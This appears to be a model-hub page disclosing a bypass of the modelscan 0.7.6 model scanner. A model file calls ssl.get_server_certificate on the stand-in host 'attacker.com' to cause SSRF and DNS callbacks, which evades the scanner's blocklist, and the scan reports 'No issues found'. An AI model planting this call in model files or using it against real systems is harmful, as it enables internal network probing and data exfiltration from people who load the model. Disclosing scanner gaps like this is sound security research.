Modelscan Bypass: ssl.get_server_certificate SSRF
Summary
Bypasses modelscan 0.7.6 while making TLS connections to arbitrary servers (SSRF).
Chain
ssl.get_server_certificate(("attacker.com", 443)) - DNS resolution + TCP + TLS handshake to attacker-controlled server.
Why It Works
sslmodule NOT in modelscan blocklist- Only
httplib(Python 2) is blocked, notssl - Single function call, no chaining needed
Impact
SSRF via TLS - DNS resolution, TCP connection, TLS handshake to attacker. Can probe internal network services, trigger DNS callbacks for data exfiltration.
Modelscan Result
No issues found!
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support